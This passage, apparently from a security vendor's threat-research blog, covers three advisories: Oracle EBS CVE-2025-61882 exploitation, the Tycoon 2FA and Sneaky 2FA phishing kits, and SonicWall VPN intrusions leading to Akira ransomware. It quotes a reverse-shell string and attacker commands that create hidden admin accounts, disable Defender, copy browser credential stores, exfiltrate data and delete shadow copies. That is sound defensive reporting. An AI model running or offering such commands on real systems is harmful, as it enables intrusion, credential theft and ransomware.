them behind an internal firewall, remove public exposure, or deny HTTP(S) to the service from untrusted networks. Implement WAF rules to block all external HTTP requests for the following specific paths, which are the initial entry points for both exploit chains:POST /OA_HTML/SyncServletPOST /OA_HTML/configurator/UiServletHunt for IOCs/compromise indicators (see TTPs & IOCs below) If suspicious activity is found, isolate affected hosts, capture forensic images, and preserve logs before remediation.Harden EBS Deployments Ensure the October 2023 CPU prerequisite noted by Oracle is applied (some Security Alert patches require prior CPU), reduce exposure of management interfaces, and enforce zero-trust/NAC for admin access.Rotate Credentials and Keys For services and accounts that access EBS if post-compromise activity is suspected; perform password resets for service accounts and rotate any API keys or database credentials that may have been accessible.Timeline~July 10, 2025: additional suspicious activity observed in some victim timelines (Google Cloud, 2025).Aug 9, 2025: earliest exploitation activity potentially linked to CVE-2025-61882 in some investigations (Google Cloud, 2025).Oct 4, 2025: Oracle initial Security Alert published (Rev 1).Oct 5, 2025: NVD initial publication of CVE-2025-61882.Oct 6, 2025: Oracle Security Alert revised (Rev 2) with clarified IOCs; CrowdStrike publishes campaign analysis attributing exploitation activity and linking to extortion campaigns. WatchTowr publishes vulnerability research article exploring the exploit chain. CISA adds the vulnerability to the Known Exploited Vulnerabilities (KEV) catalog.TTPs & IOCsTTPs:Reconnaissance & Scanning Internet-wide probes targeting EBS endpoints (e.g., /OA_HTML/SyncServlet, /OA_HTML/configurator/UiServlet).Unauthenticated RCE via Templates Malicious XSLT/template upload and preview in BI/XML Publisher leading to code execution.SSRF + Header Manipulation Crafted getUiType XML with return_url (SSRF) and CRLF injection to control outbound requests and headers.Internal Pivoting Connection keep-alive and path traversal (e.g., /OA_HTML/help/../ieshostedsurvey.jsp) to reach internal services on ports like 7201/TCP.XSLT-driven RCE & Persistence Remote stylesheet loading executes Java extension functions → RCE; attackers then deploy web shells or in-memory servlet filter backdoors for persistence.Data Theft & Extortion Rapid EBS data discovery, exfiltration over HTTPS, and use of stolen data in extortion campaigns.Searchable IOCsThe following IOCs were stated in Oracle Security Alert Advisory (Oracle, 2025)Example IPs flagged for GET/POST activity200[.]107[.]207[.]26185[.]181[.]60[.]11Exploit PoC / archive SHA-256s76b6d36e04e367a2334c445b51e1ecce97e4c614e88df4f72b104ca0f31235d — oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zipInside PoC archive:aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 — exp.py6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b — server.pyExample suspicious command string seen after compromise sh -c /bin/bash -i >& /dev/tcp// 0>&1 - indicative of reverse shell activity.Community telemetry:GreyNoise has tags associated with CVE-2025-61882-related probes, which at the time of analysis (October 21, 2025) include 63 malicious IPs. (GreyNoise, 2025)Centripetal’s PerspectiveCentripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense designed to automatically identify and block exploitation attempts of vulnerabilities such as CVE-2025-61882. This particular flaw, has been used by threat actors to send specially crafted HTTP requests to Oracle E-Business Suite (EBS) BI Publisher integration endpoints, resulting in the execution of attacker-controlled code within the context of the EBS application process.To better understand the scope and timeline of related exploitation activity, Centripetal analyzed network indicators supplied by Oracle in conjunction with GreyNoise community telemetry. The review covered data collected between July 1 (before the first signs of suspicious scanning and probing behavior were reported) and October 22, 2025. This period captures the pre-disclosure reconnaissance phase, the escalation around the time of public disclosure, and the post-exposure scanning surge.At the time of analysis, CleanINTERNET demonstrated 97.1% coverage against the IP addresses and domains associated with the reported threat activity (Figure 1). This high level of overlap highlights the platform’s ability to automatically detect and neutralize exploitation attempts even before official indicators were widely shared.Figure 1. IP CoverageTelemetry showed that scanning and enumeration activity against EBS-related endpoints remained steady from July through mid-September. However, there was a clear spike in scanning after September 22, suggesting that reconnaissance intensified once preliminary details about the vulnerability began circulating in underground or semi-public sources. The largest surge occurred immediately after October 5, a day after Oracle publicly disclosed the vulnerability. This pattern strongly supports CrowdStrike’s assessment that the exploitation of CVE-2025-61882 is largely opportunistic, with actors rapidly targeting newly exposed or unpatched systems following public awareness of the flaw (Figure 2).Figure 2. Number of Events per DayFurther analysis of behavioral patterns revealed that the primary adversary tactic was reconnaissance (Figure 3). Attackers were primarily engaged in scanning, enumeration, and endpoint fingerprinting rather than executing fully weaponized payloads at scale, consistent with the early phases of an opportunistic exploitation campaign.Figure 3. Percentage of IP IoCs Associated with a TacticBy leveraging a fusion of open-source threat intelligence, partner-provided indicators, and internally curated telemetry, CleanINTERNET continuously aggregates, correlates, and enriches global threat data in real time. This intelligence is then translated into automated policy enforcement that blocks malicious or suspicious traffic at the network perimeter before it reaches customer environments.This approach allows organizations to maintain a reduced attack surface, prevent lateral movement, and detect early signs of exploitation without waiting for manual updates or reactive countermeasures. CleanINTERNET’s combination of machine-speed threat blocking and human-validated intelligence ensures that customers are shielded from known and emerging exploitation attempts, preserving both operational continuity and business resilience in the face of evolving threats like CVE-2025-61882. CVE-2025-61882 represents one of the most significant zero-day threats targeting Oracle E-Business Suite in recent years, combining unauthenticated access, low exploit complexity, and high impact on business-critical systems. The exploitation chain, ranging from SSRF and template injection to remote code execution and persistent web shell deployment, highlights how quickly adversaries can operationalize new flaws to compromise enterprise systems.Analysis by multiple security vendors confirms that exploitation began weeks before public disclosure, with activity intensifying immediately after the vulnerability was made public. This timeline reinforces the need for organizations to adopt proactive, intelligence-led defenses that detect and block malicious behavior before official indicators are available.Organizations running Oracle EBS should treat this as an active threat, immediately apply Oracle’s security updates, restrict exposure of BI Publisher and Concurrent Processing endpoints, and continuously monitor for abnormal outbound connections or unauthorized template or XSLT uploads.Ultimately, the exploitation of CVE-2025-61882 underscores the importance of speed, visibility, and automation in modern cybersecurity operations, where the difference between compromise and protection often comes down to how quickly intelligence is acted upon.Centripetal is pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.ResourcesOracle - Security Alert Advisory - CVE-2025-61882Crowdstrike - CrowdStrike Identifies Campaign Targeting Oracle E-Business Suite via Zero-Day Vulnerability (now tracked as CVE-2025-61882)Oligo - CVE-2025-61882: Oracle E-Business Suite Zero-Day Exploited in Clop Extortion CampaignsNIST - CVE-2025-61882Google Cloud - Oracle E-Business Suite Zero-Day Exploited in Widespread Extortion CampaignWatchTowr - Well, Well, Well. It’s Another Day. (Oracle E-Business Suite Pre-Auth RCE Chain - CVE-2025-61882) --- ### [Tycoon 2FA versus Sneaky 2FA: Two PhaaS Campaigns Targeting MFA Bypass](https://www.centripetal.ai/threat-research/typhoon-versus-sneaky) Published: 2025-10-15 Summary: Tycoon 2FA and Sneaky 2FA are Phishing-as-a-Service platforms exploiting MFA through adversary-in-the-middle attacks, enabling credential theft and large-scale phishing with minimal technical skill. The Tycoon 2FA and Sneaky 2FA campaigns are two prominent phishing as a service (PhaaS) operations active in 2025. Both aim to bypass multi factor authentication (MFA) using adversary in the middle (AiTM) tactics to steal credentials and session cookies (SOCRadar, 2025). These kits are sold or rented to cybercriminals with minimal technical skill, enabling scalable phishing campaigns.While both campaigns share a common objective, credential theft, they differ in their infrastructure, delivery methods, and targeting strategy. Tycoon 2FA is a mature, scalable PhaaS platform with widespread adoption, whereas Sneaky 2FA operates in a more selective and evasive manner, with emphasis on stealth (Sekoia, 2025).Malware/Campaign Details & PurposeTycoon 2FAA well established PhaaS platform with consistent infrastructure growth. DNSFilter recently attributed over 65 root domains to its active operations (DNSFilter, 2025)Leverages AiTM phishing proxies to intercept both login credentials and session cookies, bypassing MFA protectionsTargets business applications such as Microsoft 365, Okta, and Google WorkspaceCommercialized on underground forums with intuitive dashboards for campaign controlSneaky 2FAA newer AiTM PhaaS platform, first observed in early 2025Uses similar MFA bypass techniques but focuses more on evasive delivery, including domain cloaking and shorter lived infrastructuresFrequently deployed in spear phishing campaigns targeting corporate environments.Employs deception mechanisms like CAPTCHA challenges and bot detection to evade automated scanningDelivery & Attack ChainTycoon 2FAThe following attack chain illustrates a real world example of a Tycoon 2FA phishing flow, as documented in an analysis by eSentire (eSentire, 2025). It highlights the use of CAPTCHAs, adversary in the middle (AiTM) proxies, and evasive infrastructure to harvest credentials and bypass MFA protections. (Figure1)Phishing email is sent with a fake invoice lureVictim is directed to a phishing site equipped with CAPTCHA and anti-bot protectionsCAPTCHA is presented to filter out automated tools and create a sense of legitimacyThe page reloads and displays a fake Microsoft login form acting as an AiTM proxyCredentials and MFA session cookies are captured and forwarded via proxy infrastructureVictim is redirected to a decoy or error page (e.g., invoice or 404) to minimize suspicionAnti-debug and anti-analysis measures remain active throughout the flow to evade detectionFigure 1. Tycoon 2FA phishing flow leveraging CAPTCHA, reverse proxy, and relay servers.New evasion features observed in Tycoon 2FA attacks since December 2024, according to AnyRun's campaign analysis, include: (AnyRun, 2025)Keystroke InterceptionContext Menu BlockingInvisible ObfuscationDisabling Clipboard CopyRotating CAPTCHAsObfuscation via EncryptionContext Menu BlockingComplex JavaScript LogicCustom Fake Page RedirectsCustom Binary EncodingDebugger Timing ChecksCustom CAPTCHAsExtended Redirect ChainsBrowser FingerprintingSneaky 2FAThe following attack chain is based on observed Sneaky 2FA activity detailed by Sekoia (Sekoia, 2025). It demonstrates how the phishing kit uses evasion, brand impersonation, and AiTM techniques in a stealthier, more targeted campaign flow.Spear phishing email is sent with a lure (QR code or fake invoice attachment)Victim scans the QR code or clicks a malicious link that redirects to a phishing siteThe phishing page is hosted on a domain mimicking a legitimate SaaS or corporate service (OneDrive, Adobe)The site uses cloaking to only serve the phishing page under specific conditions (user-agent, referrer, IP range)A fake login portal is displayed that proxies credentials and MFA session cookies via an AiTM mechanismOnce harvested, the victim is redirected to a benign or blank page to avoid suspicionThe phishing domain is taken offline shortly after use to minimize detection and IOC propagationFigure 2. Sneaky 2FA phishing flow using QR lures, domain cloaking, and AiTM proxying (Sourced from Sekoia)Operational ModelTycoon 2FATycoon 2FA operates as a commercial PhaaS offering, available through dark web forums and marketplaces. Access is typically granted to affiliates via subscription. The platform includes a management dashboard, hosting infrastructure, and regularly updated phishing templates.Notable operational characteristics include:Affiliate dashboard: Users can view harvested credentials, configure new campaigns, and rotate domainsInfrastructure at scale: DNSFilter reported at least 65 root domains tied to Tycoon infrastructure (DNSFilter, 2025)Coordinated Expansion into Spanish (.es) Domains: DNS Filter reported an operational surge in .es infrastructure starting April 7,2025 (DNSFilter, 2025). This significant increase represents a more intensive subdomain generation compared to other top TLD in recent months for this campaignResilience through automation: New infrastructure is spun up regularly to evade takedownsSupport and feature development: Frequent updates to maintain evasion and effectiveness (AnyRun, 2025)Sneaky 2FASneaky 2FA follows a more exclusive and stealth focused operational model. It is not broadly advertised or sold in public marketplaces. Instead, it appears to be distributed privately or used by a smaller number of actors.Operational characteristics include:Private or invite only distribution, limiting access to vetted actorsHigh value targeting: Prioritizes corporate credentials, especially those linked to administrator or SaaS accessShort lived infrastructure: Many domains are live for only a few days, with limited overlap (Sekoia, 2025)Evasion by design: Built-in cloaking and anti-analysis features make Sneaky 2FA harder to detect and attribute (Sekoia, 2025)Centripetal’s PerspectiveCentripetal has been closely monitoring the evolution of the Tycoon and Sneaky 2FA phishing campaigns. While Tycoon 2FA, a more robust adversary in the middle (AiTM) operation, has demonstrated broader distribution and higher operational sophistication, Sneaky 2FA continues to surface across various threat actor infrastructures.For this analysis, we reviewed over 170 Sneaky 2FA IOCs sourced from GitHub repositories maintained by eSentire and Sekoia. In parallel, we examined 306 Tycoon related IOCs from the same repositories, supplemented by an additional feed from DNSFilter that included some of the most recent top level domains leveraged in the campaign.This section compares the Sneaky 2FA and Tycoon 2FA campaigns using the IOCs referenced in this report, focusing on Centripetal’s 2025 coverage, preferred registrars, domain detection timeframes, and top-level domain usage. The goal is to supplement internal findings with additional context from external sources.Domain Detection Time FrameThe initial analysis of the timeframe between domain creation and first appearance in CTI for the Sneaky 2FA campaign shows an average of 113 days for domains not previously identified in Centripetal’s threat intelligence. Notably, over 32% of these IOCs went undetected for more than 90 days before being aggregated into threat intelligence datasets.Figure 3. Sneaky 2FA Domains Distribution by Number of Days from Creation to First Appearance in CTIThe notable trigger domain driving the higher average in this analysis is fabribat[.]com (Figure 3), a 9 year old domain that illustrates the reuse of aged infrastructure commonly observed in phishing campaigns. Historical records show that although the domain is mature, it was originally created in 2017 to impersonate an Ecuadorian battery business. (Figure 5)In comparison, the legitimate business domain (Figure 4) is 22 years old, with no evident ties to fabribat[.]com in terms of registrant information or other ownership details. Historical snapshots of fabribat[.]com (Figure 5) show that it hosted content for only a short period, suggesting it was unweaponized or dormant for much of its lifetime. This pattern aligns with recycled phishing infrastructure that is cycled through multiple campaigns, often evading detection, particularly when the domain remains inactive between operations.Figure 4. Legitimate DomainFigure 5. Historical Snapshots of fabribat[.]com between 2017 - 2025This tactic, frequently observed in the Sneaky 2FA campaign, allows threat actors to significantly extend the operational lifetime of their domains and evade detection by most security analysis tools and automated sandboxes. By keeping infrastructure dormant or serving only benign content until shortly before launch, actors minimize their exposure in threat intelligence datasets and reputation feeds. Once activated, these domains often deliver short high impact phishing bursts, frequently gated behind bot detection and geofencing to conceal malicious content from automated crawlers, before being cycled out of use, as shown in domain activity data from DomainTools history (Figure 6). The rotation of such infrastructure, combined with the reuse of aged or previously legitimate domains, makes them considerably more difficult to correlate and track across related campaigns.Figure 6. fabribat.com History (Sourced from Domain Tools)This finding reinforces our assessment of Sneaky 2FA as a more targeted and stealthier campaign, using brief, controlled activity windows to evade detection and extend infrastructure lifespan. This contrasts with the higher volume, more detectable operations of Tycoon 2FA.For Tycoon 2FA, the average time from domain creation to first appearance in CTI is 35 days. While the dataset analyzed for Tycoon is significantly larger than that of Sneaky 2FA, an important factor influencing the average, it is notable that the longest period a Tycoon domain went unflagged in threat intelligence was just over 300 days, compared to more than 3,000 days in the Sneaky 2FA analysis. Additionally, only 9.63% of Tycoon IOCs were first observed in CTI more than 90 days after creation, compared to 32.4% in the previous Sneaky 2FA analysis. (Figure 7)Figure 7. Tycoon 2FA Domains Distribution by Number of Days from Creation to First Appearance in CTIThe vast majority of IOCs for this campaign are identified in threat intelligence feeds shortly after creation, driven by the short-lived domain strategy employed. These domains are typically registered in bulk, often following a domain generation algorithm (DGA) pattern, and make use of burnable fully qualified domain names (FQDNs). A notable example of this trend was documented by DNSFilter, which shared a list of recent IOCs highlighting the campaign’s shift toward the Spanish (.es) top-level domain (Figure 8). Such strategies commonly trigger “pattern-matching rules” within threat intelligence platforms, enabling the rapid identification of newly registered domains that match known Tycoon templates.Figure 8. Example of short-lived, burnable DGA domains (Sourced from DNSFilter)Registrar TrendsNamesilo LLC emerges as the most frequently used registrar for both campaigns, comprising 28.8% of Sneaky 2FA domains and 73.7% of Tycoon 2FA domains, as shown in figure 9 below. This indicates a strong preference for Namesilo in both operations.Registrar Profile: Namesilo LLC is an ICANN-accredited American domain registrar, founded in 2010 and managing over 3 million active domains by late 2019, placing it among the top global registrars.Attraction Factors for Adversaries:Offers low pricing, no hidden fees, and free WHOIS privacy, making bulk domain registration cost-effective and more private (namesilo)Provides anti-abuse tools such as Domain Defender, transfer locks, account monitoring, and DNSSEC support, which may help adversaries manage infrastructure while delaying detection (namesilo)Figure 9. Distribution of Domain Registrars for Sneaky and Tycoon 2FATop Level DomainsFigure 10 shows distinct TLD preferences across the two campaigns. For Tycoon 2FA, the top three TLDs are .ru first, followed by .com and .es. The heavy use of .ru is notable, as this TLD belongs to a country under U.S. sanctions, often resulting in immediate or near immediate blocking by many organizations and security providers. According to KnowBe4 Threat Lab (KnowBe4, 2025), there was a 98% spike in phishing campaigns leveraging .ru domains between December 2024 and January 2025, with over 1,500 unique malicious .ru domains identified. Many of these domains were hosted by bullet proof providers that ignore abuse reports, enabling long dwell times and sustained campaign operations. This makes .ru domains especially attractive for phishing operators seeking to remain online longer and complicate attribution efforts. While the use of .ru domains can sometimes indicate infrastructure linked to Eastern Europe, it’s important to emphasize that TLD usage alone is not a reliable indicator of attribution for these two campaigns. The inclusion of .es reflects a recent shift in Tycoon’s infrastructure, as mentioned earlier, where this ccTLD has been increasingly leveraged to diversify domain registrations and bypass TLD based blocking.For Sneaky 2FA, the top three are .com, .org, and .net, reflecting a preference for broadly trusted, mainstream TLDs that can blend more easily into legitimate traffic.Overall, Tycoon’s concentration on .ru suggests a high-risk, high-volume model with predictable blocking patterns, while Sneaky’s approach favors persistence through reputable TLDs and a more balanced distribution.Figure 10. Top Level Domain Distribution by campaignsCampaign Traffic ComparisonA report by Barracuda (Barracuda,2025) on phishing-as-a-service (PhaaS) attacks highlighted a sharp increase in early 2025, with PhaaS campaigns accounting for the majority of incidents observed in January. According to Barracuda, more than 89% of these incidents were attributed to Tycoon 2FA, 8% to EvilProxy (another PhaaS tool), and 3% to Sneaky 2FA (Figure 11).Figure 11. Activity by Platform Distribution (Sourced from Barracuda)We conducted a separate internal analysis to determine how much of this information remains valid as of August 2025. Our findings align with Barracuda’s report, showing that Tycoon 2FA accounted for 95.59% of all observed events and findings, while Sneaky 2FA represented 4.41% across Centripetal’s customer base. This evidentiary data confirms that Sneaky 2FA continues to be actively leveraged in high-profile, low volume spear phishing campaigns and is operating as originally intended. (Figure 12)Figure 12. Observed Activity by Platform Distribution in Percentages (Sourced from Centripetal)Centripetal’s CoverageCentripetal’s threat intelligence coverage for the Sneaky 2FA and Tycoon 2FA IOCs referenced in this report for 2025 shows a notable disparity between the two campaigns. Sneaky 2FA maintained a high coverage rate of 93.6%, with 6.4% of IOCs not covered at the time of sampling. Although there are some IOCs identified as not covered in the Sneaky 2FA campaign, the low percentage of recorded findings suggests minimal impact on overall detection capability. In contrast, Tycoon 2FA achieved full coverage, with 100% of identified IOCs included in Centripetal’s detection scope. These findings indicate consistently strong visibility for both campaigns, though a small portion of Sneaky 2FA infrastructure remained outside immediate coverage. (Figure 13)Figure 13. Centripetal’s coverage through 2025The Tycoon 2FA and Sneaky 2FA campaigns illustrate two distinct but equally dangerous models of AiTM-enabled phishing. Tycoon 2FA thrives on scale, automation, and predictable infrastructure patterns, making it more visible but also more prolific, while Sneaky 2FA prioritizes stealth, aged infrastructure reuse, and selective targeting to evade detection for extended periods. Centripetal’s analysis confirms strong coverage for both campaigns, with Tycoon achieving complete detection and Sneaky maintaining high visibility despite its evasive approach. Centripetal will continue to closely monitor both operations for any shifts in infrastructure, targeting, or tactics to ensure timely detection by CleanINTERNET service and maintain proactive protection for our customers against evolving AiTM phishing threats.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.ResourcesBarracuda - Threat Spotlight: A million phishing-as-a-service attacks in two months highlight a fast-evolving threatNordPass - Phishing-as-a-service: like car rental for smugglersSOCRadar - Tycoon 2FA: An Evolving Phishing Kit Powering PhaaS ThreatsInfosecurity Magazine - Sneaky 2FA Joins Tycoon 2FA and EvilProxy in 2025 Phishing SurgePR Newswire - DNSFilter Research Warns Tycoon 2FA Expanding Phishing-as-a-Service OperationDNSFilter - Tycoon 2FA Infrastructure Expansion: A DNS Perspective, and Release of 65 Root Domain IOCsANYRUN - Evolution of Tycoon 2FA Defense Evasion Mechanisms: Analysis and TimelineGitHub - Sneaky & Tycoon IOCs Repo (Esentire)GitHub - Sneaky & Tycoon IOCs Repo (Sekoia)Sekoia - Sneaky 2FA: exposing a new AiTM Phishing-as-a-ServiceESENTIRE - Your MFA Is No Match for Sneaky2FADomain Tools - Fabribat[.]com domain informationNamesilo - Domains, cheap, easy and secureknowbe4 - 98% Spike in Phishing Campaigns Leveraging Russian (.ru) Domains. --- ### [Sonicwall SSL VPN Exploitation](https://www.centripetal.ai/threat-research/sonicwall-ssl-vpn-exploitation) Published: 2025-10-13 Summary: A suspected zero-day vulnerability in SonicWall Gen 7 SSL VPN appliances allows threat actors to bypass multi-factor authentication and gain unauthorized access to internal networks, leading to… A suspected zero-day vulnerability in SonicWall Gen 7 SSL VPN appliances is being actively exploited by threat actors to bypass multi-factor authentication (MFA), gain unauthorized access to internal networks, and deploy ransomware, primarily Akira. As of early August 2025, no CVE has been assigned, and SonicWall has yet to confirm the precise technical vector. However, incident telemetry and third-party forensics indicate on-going targeted exploitation of the SSL VPN functionality in Gen 7 firewall firmware.The adversaries appear to exploit this suspected zero-day to authenticate to the management interface or VPN portal without valid credentials or MFA tokens. Post-access, they perform extensive internal reconnaissance, credential harvesting, and lateral movement, culminating in the deployment of Akira ransomware payloads (Huntress, 2025, Artic Wolf, 2025).Vulnerability TypeThe vulnerability is currently unclassified and not associated with a public CVE. Based on behavioral analysis and available vendor reporting, the flaw enables MFA bypass on the SonicWall SSL VPN portal. While the exact exploit mechanism remains unknown, affected devices had SSL VPN and management interfaces exposed to the internet.Observations based on public reporting:MFA was bypassed mainly without brute-force or credential stuffingAccess appeared to use valid user sessions or exploited trust relationshipsAffected appliances were running outdated firmwareArctic Wolf emphasized that the access patterns did not resemble password guessing or credential stuffing attacks, suggesting a previously unknown exploit path (Huntress, 2025, Arctic Wolf, 2025).Impacted VersionsSonicwall Gen 7 firewalls (TZ, NSa series)Suspected: SonicOS 7.2.0-7015 and earlierAccording to SonicWall’s official advisory published on August 4, 2025, impacted organizations had SSL VPN enabled.Mitigation StepsConsolidated recommendations from SonicWall, Huntress, and Arctic Wolf include:Disable SSLVPN Services Where PracticalStrongly advised to disable SonicWall SSL VPN access until an official patch is released.Restrict SSLVPN AccessIf SSL VPN must remain enabled, restrict it to a minimal allow-list of trusted source IPs.Segment network access from the VPN to prevent lateral movement to critical systems.Enable Security ServicesActivate Botnet Protection and Geo-IP Filtering on the firewall.Enforce Multi-Factor Authentication (MFA)Enable MFA for all remote access.Note: MFA alone may not prevent this specific exploit.Remove Unused or Inactive AccountsDelete any unused local firewall accounts, especially those with SSL VPN access.Audit Service AccountsEnsure SonicWall or LDAP accounts do not have unnecessary privileges such as Domain Admin.Follow the principle of least privilege.Practice Good Password HygieneEncourage regular password changes across all user accounts.Block VPN Authentication from Suspicious Hosting ASNsConsider blocking VPN logins from the following ASNs:AS23470: ReliableSite.Net LLCAS215540: Global Connectivity Solutions LLPAS64236: UnReal Servers, LLCAS14315: 1GSERVERS, LLCAS62240: Clouvider LimitedNote: Block only for VPN authentication to avoid operational disruption.Threat HuntingUse available IOCs to hunt for signs of compromise across internal systems.Exploit ProcessThe attack chain observed in incidents involving SonicWall appliances reflects a well-rehearsed, modular playbook. While the initial access vector remains the SonicWall SRA or SMA series devices, the post-exploitation activity has followed a familiar progression across incidents. This includes host and network reconnaissance, installation of remote management tooling, evasion of endpoint defenses, credential theft, and ransomware deployment. The following breakdown summarizes confirmed activity reported publicly by Huntress.Initial AccessExploit of Edge Appliance: Attackers gain access by exploiting a zero-day or unpatched vulnerability in Gen 7 SonicWall SMA devices.Use of Over-Privileged Accounts: Access is often gained via over-privileged local or LDAP-linked accounts such as sonicwall or LDAPAdmin. These accounts are logged into via RDP, logging into compromised accounts, or, in some cases, brute forcing.Post-Exploitation TacticsEnumerationNetwork Scanning and Domain Reconnaissance After gaining a foothold, attackers survey the network to identify reachable systems, trust relationships, and AD structures.Tools: Advanced_IP_Scanner, netscan.exe, nltest, and PowerShell AD cmdlets.Example Commands:nltest.exe /trusted_domains : Lists trusted domains.Install-WindowsFeature RSAT-AD-PowerShell : Installs tools for querying Active Directory.Get-ADComputer -Filter * : Enumerates all domain-joined computers.PersistenceInstallation of RMM Tools Remote access tools such as AnyDesk, ScreenConnect, and OpenSSH were deployed to maintain persistent access.Deployed via: msiexec.exe /i "C:\\ProgramData\\OpenSSHa.msi"Account Creation and Privilege EscalationNew users added to local or domain groups:net user lockadmin Msnc?42da /addnet group "Domain Admins" azuresync /addHidden accounts created using registry edits:reg add "HKLM\\...\\Winlogon\\SpecialAccounts\\UserList" /t REG_DWORD /v commuser /d 0 /fLateral MovementRemote Execution Techniques Attackers moved laterally using:WMI: wmic /node:TARGET cmd /c <payload>PowerShell Remoting: For interactive sessions or remote script execution.RDP Brute Force: Attempts to authenticate across systems using stolen or guessed credentials.Domain Controller TargetingExample: wbadmin.exe start backup : Used to extract Active Directory database.Credential TheftExfiltration of Credentials from BrowsersChrome/Edge password stores copied directly from user profiles.Example: copy "...\\Edge\\User Data\\Default\\Login Data" "C:\\Windows\\Temp\\..."Custom Scripts for Dumping CredentialsExample: Veeam_Dump_Postgresql.ps1 : Used to extract backup system credentials.Defense EvasionDisabling Windows Defender and FirewallsPowerShell and CLI commands usedSystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1 : Disables non-critical notifications from Windows Defender.netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow : Creates a firewall rule that permits incoming TCP connections on port 3389, effectively enabling Remote Desktop access to the computer.Set-MpPreference -DisableRealtimeMonitoring $true :Disables Microsoft DefenderUse of Windows driversrwdrv.sys: A legitimate driver for the ThrottleStop utility, abused by Akira affiliates to gain kernel-level access ****on compromised systems. It enables a Bring Your Own Vulnerable Driver (BYOVD) ****technique that likely facilitates AV/EDR evasion or disablement.hlpdrv.sys: A malicious driver registered as a service, used to modify Windows Defender settings by altering the DisableAntiSpyware registry key via regedit.exe. It likely relies on elevated access granted by rwdrv.sys to execute successfully.Log ClearingBatch files used to automate event log deletion.Staging & ExfiltrationData Compression and Exfiltration:Tools: WinRAR used for staging, fzsftp.exe (FileZilla SFTP) for exfiltration.Example:WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . X:\\[Redacted]fzsftp.exe -v :Uploads staged data to attacker-controlled servers.Ransomware DeploymentData Destruction and Payload Executionvssadmin.exe delete shadows /all /quiet : Deletes shadow copies to prevent recovery.w.exe -p=\\\\[redacted]\\C$ -n=1 : Launches the Akira ransomware payload, encrypting targeted file systems.This structured post-exploitation chain highlights the blend of automated tooling and hands-on-keyboard attacker interaction. Despite minor differences between individual incidents, the tactical core remains consistent, underscoring the sophistication and repeatability of this threat actor's operations.TimelineJuly 15, 2025 - Attackers wielding the Akira ransomware and possibly a zero-day exploit have been spotted targeting SonicWall firewallsJuly 25, 2025 - Huntress have detected around 20 different attacks with variations observed in the tradecraftAugust 4, 2025 - Sonicwall publishes a notice with recommended mitigation stepsIOCsIn early August, 2025, security vendors such as Huntress, GuidePoint Security and FieldEffect have shared the following IoCs:IP Addresses (Attacker-Controlled)- 42.252.99[.]59 - 45.86.208[.]240 - 77.247.126[.]239 - 104.238.205[.]105 - 104.238.220[.]216 - 181.215.182[.]64 - 193.163.194[.]7 - 193.239.236[.]149 - 194.33.45[.]155 - 162.213.194[.]186 - 107.158.128[.]106 - 66.165.243[.]39 Malware & Toolingw.exe – Ransomware executableSHA256: d080f553c9b1276317441894ec6861573fa64fb1fae46165a55302e782b1614dwin.exe – Ransomware executableC:\\ProgramData\\winrar.exe – Data staging toolC:\\ProgramData\\OpenSSHa.msi – OpenSSH installerC:\\Program Files\\OpenSSH\\sshd.exe – SSH binary used for exfiltrationC:\\programdata\\ssh\\cloudflared.exe – Cloudflare tunneling toolC:\\Program Files\\FileZilla FTP Client\\fzsftp.exe – Exfiltration toolC:\\ProgramData\\1.bat – Attacker scriptC:\\ProgramData\\2.bat – Attacker scriptUsers\\**REDACTED**\\AppData\\Local\\Temp\\rwdrv.sys - a legitimate driver abused by Akira affiliates. SHA256: 16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0Users\\**REDACTED**\\AppData\\Local\\Temp\\hlpdrv.sys - a malicious driver. SHA256: bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56ASNs / CIDRs (Hosting Adversary Infrastructure)ASNASN NameCIDRAS24863LINKNET45.242.96.0/22AS62240Clouvider45.86.208.0/22AS62240Clouvider77.247.126.0/24AS23470ReliableSite LLC104.238.204.0/22AS23470ReliableSite LLC104.238.220.0/22AS174COGENT 174181.215.182.0/24AS62240Clouvider193.163.194.0/24AS62240Clouvider193.239.236.0/23AS62240Clouvider194.33.45.0/24Compromised or Created AccountsbackupSQL – User created by attackerlockadmin – User created by attackerObserved Passwords Used by Threat ActorsPassword123$Msnc?42daVRT83g$%ceThe recent exploitation of SonicWall Gen 7 SSLVPN appliances reflects a coordinated and multi-stage intrusion campaign likely designed to gain persistent access, stage data, and deploy ransomware. The threat actors have demonstrated familiarity with firewall configurations and leveraged both native Windows tools and third-party utilities (e.g., OpenSSH, FileZilla, Cloudflare) to evade detection and exfiltrate data.Organizations relying on SonicWall appliances for remote access should treat this as an active threat and follow emergency mitigation guidance. Even if SSLVPN cannot be disabled, segmentation, MFA, and allow-listed IPs are essential. Future updates from SonicWall and other trusted vendors may further clarify the initial access vector and exploit chain. Until then, detection teams should treat this as a reminder that prompt patch application, rigorous password hygiene, and enforcement of MFA are critical to reducing the attack surface.Centripetal’s PerspectiveCentripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against vulnerabilities such as the recently exploited SonicWall SSL VPN flaw, which has been actively used in the wild to gain unauthorized access, deploy malware, and enable data exfiltration. Leveraging billions of threat indicators, CleanINTERNET dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats.UPDATESOctober 13, 2025As of October 10, Huntress has reported widespread compromise of SonicWall SSLVPN devices across multiple Huntress customer environments. Threat actors are authenticating rapidly into numerous accounts, indicating use of valid credentials rather than brute-force methods. The activity began around October 4, with clustered logins observed over the next two days. Huntress observed over 100 impacted SSLVPN accounts across 16 customer environments, with authentications traced to 202.155.8[.]73. In some cases, the actors 